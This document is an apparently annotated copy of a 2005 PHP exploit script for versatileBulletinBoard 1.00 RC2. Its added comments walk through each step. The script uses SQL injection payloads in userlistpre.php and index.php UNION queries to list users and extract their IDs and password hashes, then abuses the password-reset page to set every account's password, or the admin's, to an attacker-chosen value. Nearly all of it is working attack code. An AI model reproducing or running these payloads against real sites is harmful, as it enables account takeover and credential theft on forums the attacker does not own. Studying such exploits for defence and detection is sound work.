versatileBulletinBoard 1.00 RC2 (possibly prior versions) SQL injection / board takeover

a script by rgod at http://rgod.altervista.org

hostname (ex: www.sitename.com)

path (ex: /versatile/ or /forum/ or just /)

specify a port other than 80 (default value)

usually vbb (default value) or vbb_

new password for all users! ;)

send exploit through an HTTP proxy (ip:port)

'; /* NOTE(review): this excerpt begins mid-statement -- the opening PHP tag, the input form and the echo whose closing quote and semicolon start this line are outside the visible text. Extraction has also stripped the HTML markup from the echo statements below (hence the many empty string echoes), and line comments (# and //) that originally ended at a line break now run to the end of the collapsed line, so the code as displayed here is not parseable as-is. */ /* show(): print a hex and ASCII dump of the raw request $headeri (a string) before it is sent. Display only; it has no network effect. */ function show($headeri) { $ii=0; $ji=0; $ki=0; $ci=0; echo ''; while ($ii <= strlen($headeri)-1) { $datai=dechex(ord($headeri[$ii])); if ($ji==16) { /* start a new 16-byte dump row */ $ji=0; $ci++; echo ""; for ($li=0; $li<=15; $li++) { echo ""; } $ki=$ki+16; echo ""; } if (strlen($datai)==1) {echo "";} else {echo " ";} $ii++; $ji++; } for ($li=1; $li<=(16 - (strlen($headeri) % 16)+1); $li++) { echo ""; } for ($li=$ci*16; $li<=strlen($headeri); $li++) { echo ""; } /* the multi-line echo that follows prints the trailing dump row; its string literal runs on to the line holding $proxy_regex */ echo "
  ".$headeri[$li+$ki]."
0".$datai."".$datai."  ".$headeri[$li]."
"; } /* $proxy_regex: loose "ip:port" pattern used only to validate the optional $proxy value; it does not range-check the octets */ $proxy_regex = '(\b\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}\:\d{1,5}\b)'; /* sendpacket(): open a plain TCP socket to $host:$port, or to the proxy when $proxy is set, write the raw HTTP request $packet, read the whole reply into the global $html and echo it HTML-escaped. Depends on the globals $proxy, $host and $port being set by the caller, and on eregi(), which was removed in PHP 7.0, so it does not run on current PHP. */ function sendpacket($packet) { global $proxy, $host, $port, $html; if ($proxy=='') {$ock=fsockopen(gethostbyname($host),$port); if (!$ock) { echo 'No response from '.htmlentities($host).'...'; die; }} else { if (!eregi($proxy_regex,$proxy)) {echo htmlentities($proxy).' -> not a valid proxy...'; die; } $parts=explode(':',$proxy); echo 'Connecting to '.$parts[0].':'.$parts[1].' proxy...
'; $ock=fsockopen($parts[0],$parts[1]); if (!$ock) { echo 'No response from proxy...'; die; } } fputs($ock,$packet); if ($proxy=='') { $html=''; while (!feof($ock)) { $html.=fgets($ock); } } else { $html=''; /* NOTE(review): this read loop keeps spinning after EOF until a CRLFCRLF sequence appears in $html, so a proxy reply that never sends a header terminator never returns */ while ((!feof($ock)) or (!eregi(chr(0x0d).chr(0x0a).chr(0x0d).chr(0x0a),$html))) { $html.=fread($ock,1); } } fclose($ock); echo nl2br(htmlentities($html)); } /* Main driver. $path, $host, $port, $proxy, $newpass and $table_prefix are not defined in this excerpt -- presumably populated from the input form via register_globals (verify). Nothing runs unless path, host, new password and table prefix are all non-empty; $p is the request target and becomes an absolute URL when a proxy is used. */ if (($path<>'') and ($host<>'') and ($newpass<>'') and ($table_prefix<>'')) { if ($port=='') {$port=80;} if ($proxy=='') {$p=$path;} else {$p='http://'.$host.':'.$port.$path;} /* STEP 1: GET userlistpre.php with a crafted "list" parameter and treat the reply body as the user listing. From a log-review standpoint, the quote plus comment opener in that parameter and the fixed User-Agent strings used throughout this script are the obvious indicators. */ #STEP 1 -> List all users... $packet="GET ".$p."userlistpre.php?list='%20or%20isnull(1/0)/* HTTP/1.1\r\n"; $packet.="Accept: */*\r\n"; $packet.="Accept-Language: it\r\n"; $packet.="Accept-Encoding: gzip, deflate\r\n"; $packet.="User-Agent: HeinrichderMiragoRobot\r\n"; $packet.="Host: ".$host.":".$port."\r\n"; $packet.="Connection: close\r\n\r\n"; show($packet); sendpacket($packet); /* NOTE(review): a non-200 reply only prints a message; the script carries on regardless */ if (!eregi("200 OK",$html)) {echo '
Exploit failed... nothing here...'; } /* $magic_q: set to 1 when the listing cannot be split into names (the script attributes this to magic_quotes_gpc); only the fixed admin uid is then tried. The eregi pattern and the explode delimiter below appear to have been HTML fragments that extraction reduced to a bare line break -- confirm against the original. */ $magic_q=0; if (!eregi('
',$html)) {echo '
It seems we have magic_quote_gpc On here...let\'s try to reset only admin password...'; $magic_q=1; } /* per-user path: split the listing into names and run the reset sequence for each of them */ if (!$magic_q) { $users=explode('
',$html); /* keep only the last space-separated word of the first chunk */ $temp=explode(' ',$users[0]); $users[0]=$temp[count($temp)-1]; /* visit every listed name; the filter skips the "anonymous" and "deleted" entries and any chunk containing a CR */ for ($i=0; $i<=count($users)-1; $i++) //each user... { if (!eregi('anonymous',$users[$i]) and !eregi('deleted',$users[$i]) and !eregi(chr(0x0d),$users[$i])) // default users, eof... { echo '
'.htmlentities($users[$i]).'
'; /* STEP 2: UNION query against the <prefix>_user table to read the numeric ID of this user; the value is scraped from the text following "subject: " in the reply */ #STEP 2 -> retrieve user ID for user $users($i) $packet="GET ".$p."index.php?target=viewmesg&select='UNION%20SELECT%20ID,ID,ID,ID"; $packet.=",ID,ID,ID,ID,ID,ID,ID,ID,ID,ID,ID,ID,ID,ID,ID,ID,ID%20FROM%20".$table_prefix; $packet.="_user%20where%20name='".$users[$i]."'/* HTTP/1.1\r\n"; $packet.="Accept: */*\r\n"; $packet.="Accept-Language: it\r\n"; $packet.="Accept-Encoding: gzip, deflate\r\n"; $packet.="User-Agent: FFC Trap Door Spider\r\n"; $packet.="Host: ".$host.":".$port."\r\n"; $packet.="Connection: close\r\n\r\n"; show($packet); sendpacket($packet); /* NOTE(review): if "subject: " is absent from the reply, $temp[1] is undefined and $uid ends up empty; nothing checks this before STEP 4 uses it */ $temp=explode("subject: ",$html); $temp2=explode("<",$temp[1]); $uid=$temp2[0]; echo "
UID -> ".htmlentities($uid); /* STEP 3: same query shape as STEP 2, this time reading the pass column (the stored password hash), scraped the same way */ #STEP 3 -> retrieve MD5 password hash for user $users($i) $packet="GET ".$p."index.php?target=viewmesg&select='UNION%20SELECT%20pass,pass,pass,pass"; $packet.=",pass,pass,pass,pass,pass,pass,pass,pass,pass,pass,pass,pass,pass,pass,pass,pass"; $packet.=",pass%20FROM%20".$table_prefix."_user%20where%20name='".$users[$i]."'/* HTTP/1.1\r\n"; $packet.="Accept: */*\r\n"; $packet.="Accept-Language: it\r\n"; $packet.="Accept-Encoding: gzip, deflate\r\n"; $packet.="User-Agent: Irvine/1.x.x\r\n"; $packet.="Host: ".$host.":".$port."\r\n"; $packet.="Connection: close\r\n\r\n"; show($packet); sendpacket($packet); $temp=explode("subject: ",$html); $temp2=explode("<",$temp[1]); $hash=$temp2[0]; echo "
hash -> ".htmlentities($hash); /* STEP 4: GET the setpass page with the scraped uid and hash and keep the session cookie from the reply's Set-Cookie header */ #STEP 4 -> go to reset password panel and retrieve a session cookie $packet="GET ".$p."index.php?target=setpass&u=".$uid."&ph=".$hash." HTTP/1.1\r\n"; $packet.="User-Agent: libwww-perl/5.53\r\n"; $packet.="Host: ".$host.":".$port."\r\n"; $packet.="Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1\r\n"; $packet.="Accept-Language: en\r\n"; $packet.="Accept-Charset: windows-1252, utf-8, utf-16, iso-8859-1;q=0.6, *;q=0.1\r\n"; $packet.="Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0\r\n"; $packet.="Connection: close, TE\r\n"; $packet.="TE: deflate, gzip, chunked, identity, trailers\r\n\r\n"; show($packet); sendpacket($packet); $temp=explode("Set-Cookie: ",$html); $temp2=explode(' ',$temp[1]); /* first space-delimited token of Set-Cookie (expected to end in ";") with "path=/" appended directly; when the header is absent $cookie is just "path=/" */ $cookie=$temp2[0]."path=/"; echo'
cookie: -> '.htmlentities($cookie).'

'; /* STEP 5: POST the new password for $uid, sending the captured cookie. NOTE(review): urlencode($newpass) runs once per loop iteration, so from the second user onward the value is double-encoded, and the success message prints the encoded form. The Accept header below is missing its trailing \r\n, so Accept-Language is glued onto the same header line. */ #STEP 5 -> reset the passoword to $newpass... $newpass=urlencode($newpass); $data="send=true&uid=".$uid."&newpass=".$newpass; $packet="POST ".$p."index.php?target=setpass HTTP/1.1\r\n"; $packet.="User-Agent: W3C_Validator/1.xxx libwww-perl/5.xx\r\n"; $packet.="Host: ".$host.":".$port."\r\n"; $packet.="Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1"; $packet.="Accept-Language: en\r\n"; $packet.="Accept-Charset: windows-1252, utf-8, utf-16, iso-8859-1;q=0.6, *;q=0.1\r\n"; $packet.="Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0\r\n"; $packet.="Referer: http://".$host.":".$port.$path."index.php?target=setpass&u=".$uid."&ph=".$hash."\r\n"; $packet.="Cookie: ".$cookie."\r\n"; $packet.="Cookie2: \$Version=1\r\n"; $packet.="Connection: close, TE\r\n"; $packet.="TE: deflate, gzip, chunked, identity, trailers\r\n"; $packet.="Content-Type: application/x-www-form-urlencoded\r\n"; $packet.="Content-Length: ".strlen($data)."\r\n\r\n"; $packet.=$data; show($packet); sendpacket($packet); if (eregi("password changed",$html)) {echo "
Exploit successful...login with username: ".htmlentities($users[$i])." and password: ".htmlentities($newpass)."
"; echo "
Remember to reset your cookies...
";} else {echo "
Exploit failed, something goes wrong or maybe you're Britney Spears ...";} }}} else { /* STEP 2b (magic_quotes path): no enumeration; a single POST resets the password of the hard-coded uid 11, assumed but not verified to be the admin account, and no session cookie is sent. The Accept header here also lacks its trailing \r\n. */ #STEP 2b -> reset only admin passoword to $newpass... $newpass=urlencode($newpass); $data="send=true&uid=11&newpass=".$newpass; $packet="POST ".$p."index.php?target=setpass HTTP/1.1\r\n"; $packet.="User-Agent: W3C_Validator/1.xxx libwww-perl/5.xx\r\n"; $packet.="Host: ".$host.":".$port."\r\n"; $packet.="Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1"; $packet.="Accept-Language: en\r\n"; $packet.="Accept-Charset: windows-1252, utf-8, utf-16, iso-8859-1;q=0.6, *;q=0.1\r\n"; $packet.="Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0\r\n"; $packet.="Referer: http://".$host.":".$port.$path."index.php?target=setpass&u=11&ph=\r\n"; $packet.="Cookie2: \$Version=1\r\n"; $packet.="Connection: close, TE\r\n"; $packet.="TE: deflate, gzip, chunked, identity, trailers\r\n"; $packet.="Content-Type: application/x-www-form-urlencoded\r\n"; $packet.="Content-Length: ".strlen($data)."\r\n\r\n"; $packet.=$data; show($packet); sendpacket($packet); if (eregi("password changed",$html)) {echo "
Exploit successful...look for admin username and login with password: ".htmlentities($newpass)."
"; } else {echo "
Exploit failed, something goes wrong or maybe you're Britney Spears ...";} } } /* required form values missing: prompt and do nothing */ else {echo '
Fill in requested fields, optionally specify a proxy...';} ?> # milw0rm.com [2005-10-10]